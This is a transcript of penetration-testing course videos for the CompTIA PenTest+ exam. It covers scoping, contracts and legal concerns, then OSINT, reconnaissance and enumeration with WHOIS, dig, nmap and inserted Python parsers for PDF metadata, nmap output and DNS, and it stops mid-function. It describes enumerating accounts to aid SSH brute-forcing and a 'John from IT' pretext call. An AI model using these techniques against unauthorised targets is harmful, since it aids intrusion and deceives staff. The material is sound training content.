you must be very, very careful. So in your CompTIA PenTest+ exam you may see a question that says: okay, so the IT director just got in touch with you and said, hey, I want to see what you have so far on the pen tests that you've been running. What are you going to do? Give that person the information? Verify if that is actually the IT director? Or, even if it is the IT director, are you going to contact your first contact, the person that actually hired you, and ask whether that person can get access to the information? Or are you going to write another contract, another statement of work, or a non-disclosure agreement, some of the documents that we're going to discuss soon enough in our next video?

Now, once again, scoping is severely critical. So what if you as a pen tester find data or a resource that is not covered by the scope agreement or rules of engagement? Well, again, these are not documents, so it must be very clear that scope agreement or rules of engagement are not documents; I use these terms in this question here because we haven't discussed the documents and document names yet. But if the pen tester finds data or any resource that is not covered by the scope or the rules of engagement that have been determined, well, what could happen? So for example, look at the possibility of getting access to the original target, a specific target, from a specific subnet, however this subnet is not covered in the agreement; or the opposite, the possibility of getting access from that target to a specific subnet, and again that subnet is not covered. So you see a situation where, as I previously mentioned, you are focusing on a specific target, but to get access to that target you see another possible route, another possible path, and that path is jumping through another subnetwork; or, differently, you do get access to a target and then from that target you have the possibility to jump into another subnetwork. Either way, if that subnet is not covered in the agreement, if the pen tester didn't discuss with the client whether he or she is allowed to get access to other resources, other devices, other networks, well, the problem is the client can actually sue you as a pen tester.

Also, you as a pen tester should make it very, very clear that downtime may occur: devices that you're attempting to hack, trying to find vulnerabilities in, may fail. So for example, one tool that we're going to see is called Nessus. Nessus is a tool that performs passive attacks but also active attacks, and there is a very high probability that, with active attacks, if the system that you're pen testing is vulnerable to a specific active attack, that system can crash. So it must be very clear; the pen tester must make it clear to the client: hey, if this is what you want me to do, you must know that there is a chance that if there is a vulnerability there, that system may crash. Now, what is acceptable? What are the systems that can crash? If they do, for how long can they go down? Maybe the client says, hey, only for 10 minutes. Okay, that's not possible, because if that system crashes it may take more than 10 minutes. So all this must be very clear; all the possible scenarios must be detailed, must be precisely described.

Now, for you as a pen tester, there is a bunch of resources that are taken for granted, that a bunch of pen testers don't care much about, specifically because we tend to be very technical, very hands-on, and we want to sit down and start pen testing, trying to find vulnerabilities. But before we do that, we have to observe, we have to draw our attention to some
resources that are very, very important and usually are taken for granted. First of all, documentation. So the company may have some XML-based systems, for example; it's using web services. Well, web services usually are XML based, and nowadays a bunch of systems are XML based. Also, those systems may use some APIs. APIs are usually documented, just like XML files are documented, so that documentation may give you as a pen tester a bunch of information: not only flaws, such as saying, okay, these are the input boxes, the text fields, the possible values, but just describing how the API works, describing how the web service works, will give you more information, and that's what a pen tester needs; a pen tester needs a lot of information. Same thing for SDKs and internal systems: if there are internal systems, there's probably going to be documentation describing those systems; the internal employees that designed those systems documented that system for sure, or at least they should have. The company will certainly have diagrams and configuration files, so all those documents are very, very useful.

So user accounts, even guest accounts, are important; networks, physical environments, all these resources that are accessible or can be accessible are going to be very important. So gather information about all that: what are the user accounts that I can find or that I have, what can they get access to, what are the networks, what are the physical environments, is there just one single location, how can I get into that single location, if there are branches how is the headquarters connected to those branches?

And finally, budget. That's why I mentioned up here limited resources taken for granted. Budget is a very, very important resource that most of the time is limited, and it must be analyzed. So the pen tester and the client must come to an agreement about the budget: what can be done, not only in regard to how many hours at most we're going to have to spend here, but also, okay, if I find something, or if I see the possibility of finding something, and we have to purchase new software, a new product, a new device, or whatever that is; and if this pen test, once again, causes a crash, for how long can your system stay down, because it's going to generate some loss of revenue. So budget is very, very important, and this is the most limited resource that is taken for granted most of the time. So keep in mind that before actually executing any type of pen test you have to first scope and plan, and the CompTIA PenTest+ exam is very, very focused on that, because they are focused on real-world scenarios, realistic scenarios. Remember that you have to determine the rules of engagement, you have to sit down with the client and answer a bunch of questions, determine the limits, determine what is included, what is not included, what is going to be given to you, and, very, very important, budget. I hope you enjoyed this video. Thank you very much.

Hello, welcome to the continuation of our scoping and planning module. Another very important matter that we have to be aware of and pay attention to when it comes to planning and scoping is the legalities, the laws, the regulations that involve pen testing.
Now, it's common to work in countries where we don't have specific laws; actually most countries don't have specific laws or regulations for pen testing. However, there are some regulations that apply to pen testing; although they are not specific, they apply to pen testing, and we have to be aware of those. Also, the CompTIA PenTest+ exam is really concerned about the contracts or the documentation, the documents that are involved in a pen testing contract, a pen testing project, and that's what we're going to discuss here in this video. So basically our focus is going to be the legal letter soup; actually we're going to see a bunch of acronyms, three-letter acronyms most of the time.

Well, first of all, we have what we know as the contract. The contract, as you all know, is just a document where the involved parties describe what is supposed to be done and how it's supposed to be done; it may also have a timeline. However, it's not a very detailed document, so that is why we have the statement of work, SOW. The statement of work is very similar to a contract; however, it has more details. It describes what is supposed to be done in detail, when it's supposed to start, when it's supposed to end, if that's the case how much it's going to cost, the cost of each phase. So let's say, and we're going to see one example here, that in this case the pen tester is supposed to execute five or six different tasks; each of those tasks will have a cost associated with it, or maybe not a cost but a certain amount of hours that will be required in order to execute it. So basically it's a contract with some more in-depth, detailed information.

Now we may also have, and that's not a requirement, the MSA, master services agreement. Pay attention to this word here, master: why is it called master services agreement? And observe that this is not something specific to pen testing projects. But going back to the MSA: why is it called master services agreement? Because usually the MSA is a document that describes services in general, or the specific services, but the description is broader, it's not very specific. For example, usually you're not going to see a timeline described in the MSA. So the MSA is basically, you can see it as a services template; it's a template document where usually the SOW is going to make some references to the MSA. So for example, to make the statement of work simpler or shorter or easier to write and to agree upon, it will many, many times, in many situations, reference the MSA document. To give you an example, let's say that we have an MSA that describes that when a pen test is performed, only a specific part of the network and only a set of devices can be pen tested. Well, that's a generic statement, or a generic rule of engagement, because it's valid for any pen test that is supposed to be performed; it doesn't matter whether this pen test is being executed in the year 2015 or 2020 or 2025, whether it's the pen test that is done in a semester or whether it's the annual pen test, it doesn't matter; those general rules are valid for any pen test. Obviously, if there is any kind of change, let's say, okay, now the company wants to allow another subnet to be pen tested as well, okay, so once again, if that's general, if the company wants to include that subnet to be pen tested in any new pen test that occurs, then the MSA would be updated. If it's a subnet that is supposed to be tested by a specific pen test, then that should be mentioned in the statement of work. And we also have the
non-disclosure agreement, or confidentiality agreement. Usually it's treated as NDA, non-disclosure agreement, but you may also see confidentiality agreement; especially in IT it's more common to use NDA, because we don't want any confusion with a certain certificate authority. Well, the NDA is the document that describes, well, basically it says that the pen tester cannot publish or make any type of information public; if the pen tester can't make anything public, the non-disclosure agreement must specify what can and what cannot be published or made public.

So these are the main documents, more precisely the documents that the CompTIA PenTest+ exam is going to demand. Now, the other one is the non-compete agreement. Personally I didn't see any questions regarding the non-compete agreement; however, it may be covered in the CompTIA PenTest+ exam. So the non-compete agreement is an agreement that an employee may have to sign, required by the employer, where the employee agrees to some metrics to avoid competition, to avoid, let's say, stealing the knowledge that the employee acquired while working for the company that is currently employing this employee. So let's say that you work for a company A, and that company A wants to make sure that you're not just going to go to another company based on salary or anything else; they want to make sure that whatever knowledge you acquired while working for this company for a certain period of time won't go to that other company. So they may make the employee sign a document that basically says: okay, counting from this date, and there must be a specific date, until this other specific date, which could be a time window of let's say three years, five years, whatever that is, that employee cannot go to another company that works in the same field, in the same area, that is directly a competitor. So for example, if a Google employee signs a non-compete agreement, that non-compete agreement would prevent this employee from moving from Google to Microsoft's Bing, since they're direct competitors, and that document prevents that from happening.

Okay, so here's an example of a contract, very simple, as you've
probably seen before. So we have the description of services, then you have the date, and there is a description of what is going to happen and how. But you can see here that, although I illustrate this document as a contract, it's not just a simple contract; this is a statement of work, that's a SOW. How can I tell that? Well, basically you can tell because there is a detailed description here, there is a timeline, that's when it starts, that's when it's supposed to end, and these are the tasks to be executed, that's how much each task is going to cost and it will require this amount of hours to be done. In this case this is not just a short-term contract, it's a long-term contract, but it's still a statement of work. Now, in this case I can assure you, because this is my contract, I signed it, that for this company, for this client, we didn't have a separate contract and a separate statement of work, and that is very common; you see companies that only do one document, just one, and there are other companies that do a contract, a generic contract, and a SOW.

And here, for the same company, we have the non-disclosure agreement. So you can see "user agreement for non-disclosure or use of proprietary and confidential information", so this agreement is entered into and is effective as of, then we have the date and the parties involved, and basically it says that the person that is being hired, which is the freelancer in this case, cannot disclose information that is acquired from their infrastructure or from their systems. Basically that's what we see here. So we just saw two examples: one was a statement of work, the other one was a non-disclosure agreement.

Now, pen testers must have some legal concerns, and the first question that must be answered, and that's just a question that you have to ask yourself as a pen tester, is: where are you all? And when I say you all, I mean the pen tester and the client; you may even have to consider that the client may be in more than one single country or one single state. So
you can have a situation where you, the pen tester, are located in Australia, the client's headquarters is in New York, and that company has branches all over the US in different states. Remember that the states of the United States are independent in this respect: they have their own laws. That means that if the pen test project involves the branches, the whole infrastructure, then it's going to be a very complex project, because the pen tester will have to know the laws and regulations required by all of those states, plus the pen tester's own country, Australia. So you have to get to know the local and the remote laws and regulations: where are you, and where is the client? The contract must also specify the jurisdiction. That means that if something bad happens, if something does not go according to what was specified in the contract and there is a lawsuit, for example, which jurisdiction settles it? Usually it's the client's location, but again it may get complex. Maybe the client has a headquarters, but the pen tester was hired to test not the headquarters but some branches, so one branch is in, let's say, Illinois and another branch is in Florida. What's going to happen in this case? Usually it's common to have separate contracts, because we have different laws for those states. So it's very, very important for the pen tester to be aware of the regulations of the locations involved in that project or those projects. In the previous video we also mentioned the types of assessment, at least the three most important types,
the three that the CompTIA PenTest+ exam requires: the objectives-based or goals-based assessment, the red team assessment, and the compliance-based assessment. A compliance-based assessment is done to make sure that the company, the client, follows some requirements defined by a specific institution. For example, I mentioned in the previous video that a company that deals with healthcare, a health insurance company for instance, must be HIPAA compliant, so it must follow the set of rules and requirements defined by HIPAA. Another one that is very common to most companies is PCI (it's misspelled on the slide as PIC; the correct name is PCI DSS). PCI DSS defines the standards that companies performing credit card transactions are supposed to follow: since the transaction happens online, what encryption standard is it supposed to use? How is the customer's information going to be stored, and where? If a customer is not a customer anymore, what is supposed to be done with that customer's information? It's supposed to be destroyed, and how? If a database is going to be migrated to another location, what is supposed to be done with the former storage location? All of those definitions are set by PCI DSS, so any company that processes credit card transactions must follow the standard. Here is a link to a document that defines how penetration testing must be performed when testing this kind of infrastructure, because organizations that process credit card transactions are obliged to perform penetration testing with a certain regularity (PCI DSS requires it at least annually and after any significant change to the environment). There are specific tests that are supposed to be done, and this guidance tells you, as a pen tester, what is supposed to be done in order to make sure that the company is PCI compliant. For example, some of the things defined there are password policies, data isolation, as I previously mentioned, and key management. These are just some of the criteria that are supposed to be defined in a company that performs credit card transactions, and that the pen tester is supposed to test, to make sure that the client is PCI compliant. So we discussed here the legalities, the legal aspects for pen testers: what a pen tester is supposed to pay attention to before, during and after a pen test project. We saw that it's very important to know how to execute a pen test, specifically when you're executing a pen test that is focused on a compliance-based assessment, and we also saw some agreement documents that are very important, especially when taking the CompTIA PenTest+ exam. So I hope you enjoyed this class.

Hello, welcome to our third module in the CompTIA PenTest+ course. In this module we're going to discuss information gathering and enumeration, or at least we're going to start discussing enumeration and the concepts involved in these two. We can say that these are two different steps; however,
they seem a lot like each other, because one actually completes the other. We can say that one is more generic whereas the other is more technical: information gathering is the more generic step, whereas enumeration is the more technical step, or at least you use more resources to try to find more specific data, more specific information. So first of all we have to understand passive information gathering. Actually we have two different types of information gathering, passive and active. What is passive information gathering? Passive information gathering is also called open source intelligence, or OSINT. What does that mean? The idea of "open source" here is not the same as open source in software development; it's a different definition. Open source here stands for gathering information that is open, information that is not enclosed within that company's infrastructure. For example, if you can gather information from a Google search, that is passive information gathering: that information is being gathered from open resources, not open source specifically but open resources, because the information is publicly available. That's where the idea of "open" comes from. So the point of performing passive information gathering is to avoid direct contact with the organization's infrastructure. Why is that so important? Keep in mind that when you're performing active information gathering, and in many situations enumeration, there is a very high probability that the activity you're executing can be detected by the target, the target company or the target person, and you want to avoid that. You don't want direct contact because you want to avoid being detected; obviously you don't want your target to know that you are targeting them. So where can you gather that type of information? From public sources: as I mentioned, Google, or any type of search engine, and there are also search engines focused on cyber security and on flaws in exposed systems. You can gather information from social media. There are so many different places where you can gather that type of information from, and we're going
to discuss them. Another type of resource that you can use in order to gather information passively is doing some searches on public computer emergency response teams. First we have to understand what a CERT, a computer emergency response team, is, because the exam demands that you know that concept. Imagine a situation where you are the cyber security analyst or cyber security engineer of a company, and although you and your team deploy all different types of cyber security resources in order to keep your systems from being hacked, it happens anyway; it could happen. So let's assume that your infrastructure has been compromised. What are you going to do now? Ideally each company should have a CERT, a computer emergency response team. What is that all about? The idea of a CERT is that once a system or an infrastructure is compromised, that must be detected, and once it's detected, what are we going to do? This CERT is responsible for doing a bunch of things, but mainly for documenting what just happened. So a CERT is a team that is responsible for writing procedures that define: in case this happens, these are the steps we're going to take. If it's a new situation and we don't have any procedure to treat that specific situation, we're going to analyze what happened and then document it, so we can gather people together and say: the next time this happens, if it does, this is what we're going to do, because this is what we did now. That's what a CERT is. Now there are some public CERTs. What does that mean? It means there is public data about situations that actually happened and how to respond to those occurrences, and some CERTs actually make information about companies available, so that is another type of resource that you can use. Now what kind of information can you gather through passive information gathering? Domains, public IP ranges: even just doing a Google search it's possible to figure out what IP addresses a company is
using. There's also another resource, WHOIS: a WHOIS lookup on a domain tells you who registered it, the contacts and the name servers, and a WHOIS lookup against the regional Internet registries tells you the public IP ranges assigned to a company. Email accounts, as you know. Physical location: that is very important, a lot of people take it for granted, but knowing the physical location and also the physical environment of a target is very important. Information about staff. Metadata: first of all you have to understand what metadata is, but it's not difficult to understand. A file has data, and you also have information about that file, data about the data, and that is the metadata. For example, let's say that you created a file seven days ago using your personal computer. If you look at the metadata of that file it's going to show the creation date, the date it was modified for the last time, who created the file, and what application or computer was used to create it. So there is a bunch of information available about the data itself.
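As an added example for the metadata passage above (this code is not part of the course), here is what those fields look like inside one common format, PDF, where they live in the /Info dictionary referenced from the file's trailer: Title, Author, Creator, Producer, CreationDate and ModDate. The sample PDF, the author name "j.doe" and the workstation name "WKS-JDOE-01" in the Producer string are constructed for this example, and the parser is deliberately minimal (no xref tables, object streams or encrypted files); it exists to show what a file gives away, not to replace exiftool.

```python
import re
from datetime import datetime, timedelta, timezone

# Constructed, minimal PDF whose /Info dictionary carries the metadata fields
# discussed in the lesson. The author and workstation names are invented.
SAMPLE_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj
2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj
3 0 obj << /Title (Q3 network diagram) /Author (j.doe) /Creator (Microsoft Word)
/Producer (ExampleWriter 2.1 on WKS-JDOE-01) /CreationDate (D:20240105093012-05'00')
/ModDate (D:20240112160000Z) >> endobj
trailer << /Root 1 0 R /Info 3 0 R >>
%%EOF
"""

# PDF date syntax: D:YYYYMMDDHHmmSS followed by Z, or +HH'mm' / -HH'mm'
PDF_DATE = re.compile(
    r"D:(\d{4})(\d{2})(\d{2})(\d{2})?(\d{2})?(\d{2})?([Z+\-])?(\d{2})?'?(\d{2})?")


def parse_pdf_date(text):
    """Turn a PDF date string into a timezone-aware datetime (None if malformed)."""
    m = PDF_DATE.match(text)
    if not m:
        return None
    y, mo, d, h, mi, s, sign, oh, om = m.groups()
    tz = timezone.utc  # 'Z' and a missing designator both mean UTC here
    if sign in ("+", "-"):
        off = timedelta(hours=int(oh or 0), minutes=int(om or 0))
        tz = timezone(off if sign == "+" else -off)
    return datetime(int(y), int(mo), int(d), int(h or 0), int(mi or 0), int(s or 0), tzinfo=tz)


def pdf_info(data):
    """Return the /Info dictionary's literal-string entries as {key: value}."""
    ref = re.search(rb"/Info\s+(\d+)\s+(\d+)\s+R", data)  # trailer -> object ref
    if not ref:
        return {}
    obj = re.search(rb"(?m)^%s\s+%s\s+obj\s*<<(.*?)>>\s*endobj" % (ref.group(1), ref.group(2)),
                    data, re.S)
    if not obj:
        return {}
    info = {}
    # /Key (literal string); the string body may contain backslash escapes
    for key, val in re.findall(rb"/(\w+)\s*\(((?:\\.|[^\\)])*)\)", obj.group(1)):
        info[key.decode("ascii")] = val.decode("latin-1")
    return info


def metadata_report(data):
    """pdf_info() with the two date fields converted to datetime objects."""
    report = pdf_info(data)
    for key in ("CreationDate", "ModDate"):
        if key in report:
            report[key] = parse_pdf_date(report[key])
    return report
```

Run `metadata_report(open("somefile.pdf", "rb").read())` against a real document to see the same fields; the Producer and Creator strings are where application versions and, sometimes, internal host names leak, and the two dates tell you how long a document has been in circulation.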
Now what about active information gathering, also called active reconnaissance, or simply reconnaissance? Reconnaissance is a step where you're still trying to gather information, but if it's active you're actually deploying tools that make direct contact with the target's infrastructure, or with the target's information where that information is hosted by the target, in such a way that the target can actually know that you are performing that type of reconnaissance. For example, hosts: similarly to the passive information gathering phase, where you can also gather information about hosts, here the information is gathered from the target's infrastructure. You're actually connecting to their infrastructure to see what hosts are available within it, and they can be desktops, laptops, servers, or devices such as routers, switches and Wi-Fi hotspots. What services are running? What are the versions of those services? What ports are open? That is usually associated with services, but not necessarily. Back in the day you could establish a relation between a service and a port: if a specific port was open, that meant the correlated service was running, and vice versa. That's not necessarily true nowadays; you can have services running on different ports, and you actually have services that use random ports. Operating systems: what are the operating systems running on those devices? And also the topology. Now how can all of this be done? There are different tools that will help you, and we're going to take a look at some of them, but let me give you an example of a very famous and common tool, nmap. nmap is basically capable of identifying all of the information we can see here: services, service versions, software versions, open ports and operating systems, and Zenmap, the graphical front end for nmap, will even build the topology for you. So what is the difference here? The difference is that nmap is actually going to connect directly to, let's say, the company's gateway router in order to gather all that information. And then you have enumeration.
Now how does enumeration differ from information gathering? Actually enumeration is also part of information gathering, but it's different from reconnaissance. Reconnaissance is a phase where we're just trying to recognize the resources available to that company. In the enumeration phase you are trying to find more specific information, such as user accounts and group accounts available in their systems. Why? Because if you are going to brute force a system, for example, if you're going to use a tool that tries user name and password combinations in order to establish an SSH connection, and you already have the valid user accounts on their systems, that's going to help you a lot, because now your tool only has to guess the password, not the user. Same thing for groups, same thing for email accounts: yes, you can gather some email accounts from the company's website, but you can gather even more if you can extract that information from their systems. So here we're looking for more specific, detailed information. Same thing for social data. Let's say a company has its own Facebook profile. That is the company's profile, and from it you can gather some information about the CEO, the president, that kind of thing, but from social media you can also gather information about the staff: who is the director's assistant, for example. That type of information may not be available on their website, but if you can find that person's name then you can probably gather more information from that person's social media. And also fingerprinting. Again, fingerprinting can be performed during the reconnaissance phase, but if it's a more specific fingerprint then it's done during the enumeration phase. Let me give an example, going back to nmap: if you're using nmap to figure out which ports are open, that's the reconnaissance phase, but if you're trying to figure out more detailed information about that router, for example what operating system and what firmware it's running, what the software versions are, and what the MAC address of that specific node is (nmap can only see the MAC address when you're on the same local network segment), then when you gather that device-specific information, that's called fingerprinting, and fingerprinting is done during the enumeration phase. So it's similar to having some of these different data, versions, ports, operating systems, but putting them together: then you have the fingerprint, because you can have different devices with the same ports and the same services running, but ideally you won't have different devices with the same ports, the same services and the same MAC address from the same vendor. That combination of information gives you a fingerprint; it uniquely identifies that device. So understanding the difference between enumeration, reconnaissance (active information gathering) and passive information gathering is very important. Why? Because this is going to be the very first step that you execute before targeting, before actually deploying an attack. Before you deploy an attack you have to gather as much information as you can, because this is going to filter your options.
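As an added example of the fingerprinting idea above (not code from the course), here is how to turn the XML that `nmap -sV -O -oX scan.xml` writes into the two things the lesson distinguishes: a service profile (open ports, service versions, OS guess), which two identically built hosts will share, and a fingerprint (profile plus MAC address), which should be unique per device. The scan output below is constructed for this example; the element and attribute names follow nmap's real XML schema, and the addresses are documentation ranges.

```python
import xml.etree.ElementTree as ET

# Constructed output of "nmap -sV -O -oX" for three hosts. Two of them are the
# same build (same ports, versions and OS) and differ only by MAC address.
SAMPLE_NMAP_XML = """<nmaprun scanner="nmap" args="nmap -sV -O -oX scan.xml 192.0.2.0/29">
<host><status state="up"/>
<address addr="192.0.2.1" addrtype="ipv4"/>
<address addr="00:11:22:33:44:55" addrtype="mac" vendor="ExampleVendor"/>
<hostnames><hostname name="gw.example.test" type="PTR"/></hostnames>
<ports>
<port protocol="tcp" portid="22"><state state="open"/><service name="ssh" product="OpenSSH" version="8.9p1"/></port>
<port protocol="tcp" portid="23"><state state="closed"/><service name="telnet"/></port>
<port protocol="tcp" portid="443"><state state="open"/><service name="https" product="nginx" version="1.24.0"/></port>
</ports>
<os><osmatch name="Linux 4.X" accuracy="88"/><osmatch name="Linux 5.X" accuracy="95"/></os>
</host>
<host><status state="up"/>
<address addr="192.0.2.2" addrtype="ipv4"/>
<address addr="00:11:22:33:44:66" addrtype="mac" vendor="ExampleVendor"/>
<ports>
<port protocol="tcp" portid="443"><state state="open"/><service name="https" product="nginx" version="1.24.0"/></port>
<port protocol="tcp" portid="22"><state state="open"/><service name="ssh" product="OpenSSH" version="8.9p1"/></port>
</ports>
<os><osmatch name="Linux 5.X" accuracy="95"/></os>
</host>
<host><status state="down"/><address addr="192.0.2.3" addrtype="ipv4"/></host>
</nmaprun>
"""


def parse_nmap_xml(xml_text):
    """Return one dict per host that is up: ip, mac, vendor, hostnames, os, open ports."""
    hosts = []
    for h in ET.fromstring(xml_text).iter("host"):
        status = h.find("status")
        if status is None or status.get("state") != "up":
            continue  # down hosts carry no fingerprintable data
        info = {"ip": None, "mac": None, "vendor": None, "hostnames": [], "os": None, "ports": []}
        for a in h.findall("address"):
            if a.get("addrtype") in ("ipv4", "ipv6"):
                info["ip"] = a.get("addr")
            elif a.get("addrtype") == "mac":  # only present on the local segment
                info["mac"], info["vendor"] = a.get("addr"), a.get("vendor")
        info["hostnames"] = [hn.get("name") for hn in h.iter("hostname")]
        best = None  # keep the highest-accuracy OS guess
        for m in h.iter("osmatch"):
            if best is None or int(m.get("accuracy", 0)) > int(best.get("accuracy", 0)):
                best = m
        if best is not None:
            info["os"] = best.get("name")
        for p in h.iter("port"):
            state = p.find("state")
            if state is None or state.get("state") != "open":
                continue  # closed/filtered ports are not part of the profile
            svc = p.find("service")
            name = svc.get("name") if svc is not None else None
            version = ""
            if svc is not None:
                version = " ".join(x for x in (svc.get("product"), svc.get("version")) if x)
            info["ports"].append((int(p.get("portid")), p.get("protocol"), name, version))
        info["ports"].sort()  # so port order in the scan does not change the profile
        hosts.append(info)
    return hosts


def service_profile(host):
    """Ports, services, versions and OS: what identical builds share."""
    return (tuple(host["ports"]), host["os"])


def fingerprint(host):
    """Service profile plus MAC address: what should be unique per device."""
    return service_profile(host) + (host["mac"],)


def find_duplicates(hosts):
    """Group hosts by service profile; groups of 2+ usually mean cloned images or load-balanced nodes."""
    groups = {}
    for h in hosts:
        groups.setdefault(service_profile(h), []).append(h["ip"])
    return {k: v for k, v in groups.items() if len(v) > 1}
```

On a real scan, feed `parse_nmap_xml(open("scan.xml").read())` in; hosts that share a service profile but have different fingerprints are worth a second look, because cloned images tend to share credentials and patch levels as well.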
This will actually give you the options that you have. Like I mentioned, if you have user accounts then you can narrow down the types of attacks that you're going to run; you can reduce the number of attempts in a brute force attack, for example. If you know the services you can avoid wasting effort: let's say I have this list of tools that I can use in order to perform an attack, but if I don't have the information I need in order to send phishing emails, because I don't have enough email accounts, then I'm not going to do that. So that's why it's very important to perform these steps. I hope you liked this, and I'll see you in our next video, which is the video where we will see different tools and resources in order to perform passive information gathering, active information gathering and enumeration. Thank you very much.

Hello, welcome to our second video in module 3. Just to remind you, our focus in this module is to learn how to perform information gathering,
both passive and active information gathering, as well as enumeration. It's difficult to perform each of these tasks separately; most of the time they go together, they hold hands, because one is a continuation of the other. You're not actually going to differentiate whether you're performing passive information gathering, active information gathering or enumeration; basically what you want to do is gather information, but you have to know the proper techniques that you should use in order to achieve that goal. In our previous video we discussed the meaning of each of these techniques, what you're actually doing. Here we're going to see some resources that we have available in order to achieve this goal. So first of all we want to take a look at the EDGAR website, at sec.gov/edgar/searchedgar/companysearch. What is EDGAR? EDGAR is a system run by the U.S. Securities and Exchange Commission that allows you to search for information about people and, mostly, companies, as you can see here. You can search for either a person's name or a company's name; most of the time you're going to be looking for a company's name. Now what kind of information can you find here? Mostly financial information, although not only that. You may wonder why you would want to gather financial information. Well, because that can give you an idea of how well that company is doing, what types of clients they're dealing with, how big the company is, that kind of thing. As you already know, every type of information you can gather will help you. Let me give an example. If you take a look at the financials of a company, and obviously this is not a detailed financial description, it can at least give you an idea of how big that company is. If your target is a very large company, there is a very high probability that their staff is also large, they have many employees, which means that performing some social engineering may be easier. Why would that be? Because you can try, for example, to call the company saying "Hi, I'm John from IT." Since the company has so many employees, the person you're calling may not know John, and may think: "I don't know John from IT, but that's because we have so many employees and I can't know everybody." In a small company the chances of that working drop a lot. So let's take a look at how EDGAR works. It's pretty simple, as all of the tools we have here are. Let's just pick a company name, let's say Netflix. When you type
a company name it searches on the fly for all companies that contain that string, so probably this one, Netflix Inc. Let me click there and see what we have. So we have Netflix Inc, what this company does (the SIC description is "Services-Video Tape Rental"), it's located in California, that's the company name, and you have the business address. Just by looking at this you can already gather some information. Now remember that we have the white box, gray box and black box methodologies. If your client is allowing you to have access to a bunch of information, if the pen test being performed is white box, obviously you don't need EDGAR. But if it's black box, you have almost no information about the company, so just by doing this type of search you can already gather something. Down here you have a bunch of documents that were filed by that company with the U.S. Securities and Exchange Commission, and you can go through some of those documents; they will help you get an idea about that company and give you more information. Another very useful website, and this is just one of many such websites, because what matters is the protocol, and the protocol is called WHOIS. This is just one example of a WHOIS website; there are many, and they may vary according to the country as well. For example, in the United States you have several websites that perform WHOIS lookups, but if you're in, let's say, Australia,
there is probably another company or government institution that takes care of WHOIS there. So what is WHOIS? This site offers WHOIS search, domain name, website and IP lookup tools, and what it actually does you can see right here: see website information. Once again, let's search for the same company, netflix.com. Actually, let's do it a little differently this time and search for microsoft.com. I'll perform the search. Here we see microsoft.com. We have some registrar info, which usually is not that helpful, but if we scroll down we can gather more. Name servers: these are the domain name servers responsible for the domain microsoft.com, so they have four name servers. This is important too, because from here you can know how many DNS servers that domain has and what they are, but down below is where you have the most important information. Now I know the company's name, I know where it's located, I have the phone number, I have an email address that I can try to contact, and now you have some specific information about that domain. This is the registrant contact information. What about the administrative contact information? In this case they are all the same, but there are situations where you have different people or different companies: for example, someone is responsible for administering the domain name registration, the registrant contact up here, but the company has a separate administrative contact, and regarding technical issues this is the person who should be contacted, let's say when a website is offline, so I should have the contact of the technical person responsible for that. Again, you're just gathering information and filtering out the type of information that is actually going to be helpful for you. Observe that here we were also able to gather some technical information: these are the domain name servers and these are their IP addresses. From here I could even start performing active information gathering, or reconnaissance. We're not going to do that now, but this is important information that we may use later during the reconnaissance phase and even during enumeration. Since we're still in the passive information gathering phase, we have to remember that the passive phase is done using techniques and resources that do not connect directly to that domain's servers, machines or active devices. If I try to actively scan this IP address, for example, I will be moving to the reconnaissance phase, and that's not what I want to do.
So far the only thing I want to do is keep working on passive information gathering, but there are some tools I can use with the information I have here. For example, we have the host command. Let's say host www.microsoft.com; we could do this on this IP address or on this name as well, but let's just take a look at microsoft.com's web server. What can I see when I use the host command? I can see that the machine called www in the microsoft.com domain is actually an alias for another machine in the edgekey.net domain (edgekey.net belongs to the Akamai CDN, so Microsoft's website is served from a third party's infrastructure), and that name, www.microsoft.com-c-3.edgekey.net, is in turn an alias for yet another machine. So I can follow their chain of names to the very end, where I can see that the final machine has this IP address, and here is another very important piece of information: that server has an IPv6 address as well, something we'll talk about later on. Now, still working on domain names, another command I have available, and actually we have many, is dig. For example, the same result I got when I searched for microsoft.com in WHOIS, which showed me their domain name servers, I can get with dig, and I can use dig whenever I want to work with domain names. Here I'm using one of Google's public resolvers (8.8.8.8): I use the @ sign to specify the name server I want to consult, I want to ask it about this other domain, microsoft.com, and what I want to ask for is the NS records, the DNS servers of this domain. I run the query and we can see that this information matches what WHOIS showed; it's just another DNS lookup. Something very interesting about dig is that you can perform any type of query related to domain names. For example, instead of NS I can use MX, which stands for mail exchange, and when I do that I see that this domain's mail exchange, its SMTP server, is microsoft-com.mail.protection.outlook.com. I can also see generic information about the domain, which is going to be very similar to what WHOIS gave us. There it is. So there are several tools that are very helpful. Note that host and dig send their queries to a resolver, Google's in this case, and not to Microsoft's own servers; that is why they still count as passive. If you query the target's authoritative name servers directly, your source address shows up in the target's DNS logs. Now I saw that microsoft.com, or at least its web server, has the IP address 104.115.148.63 (at the time of recording), and let's say that I want to know where this is. There are ways of searching for a geographical location, but this is not the moment for that.
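As an added example for the host and dig passage above (not code from the course), here is the DNS wire format those tools speak, done by hand so you can see exactly what a passive lookup sends and receives. build_query() produces the same bytes `dig NAME TYPE` sends to a resolver, parse_response() decodes the answer section, including the compressed names every real resolver uses, and follow_chain() walks the CNAME aliases to the final A and AAAA records the way `host www.microsoft.com` did in the video. The resolver address 8.8.8.8 is Google's public resolver; every name and address in SAMPLE_RESPONSE is constructed for this example, so the block runs offline, and only live_lookup() touches the network.

```python
import socket
import struct

QTYPES = {"A": 1, "NS": 2, "CNAME": 5, "MX": 15, "AAAA": 28}
TYPE_NAMES = {v: k for k, v in QTYPES.items()}


def encode_name(name):
    """'example.test' -> b'\\x07example\\x04test\\x00' (length-prefixed labels)."""
    labels = name.rstrip(".").split(".")
    return b"".join(bytes([len(l)]) + l.encode("ascii") for l in labels) + b"\x00"


def build_query(name, qtype, txid=0x1234):
    """Same bytes `dig NAME TYPE` sends: header with RD=1 and one question."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", QTYPES[qtype], 1)


def decode_name(data, offset):
    """Decode a possibly compressed name (RFC 1035 4.1.4); returns (name, end offset)."""
    labels, end, jumped = [], offset, False
    while True:
        length = data[offset]
        if length & 0xC0 == 0xC0:  # pointer into an earlier part of the message
            pointer = struct.unpack("!H", data[offset:offset + 2])[0] & 0x3FFF
            if not jumped:
                end = offset + 2
            jumped, offset = True, pointer
            continue
        offset += 1
        if length == 0:
            return ".".join(labels), (end if jumped else offset)
        labels.append(data[offset:offset + length].decode("ascii"))
        offset += length


def parse_response(data):
    """Return [(owner, type, ttl, value)] for each record in the answer section."""
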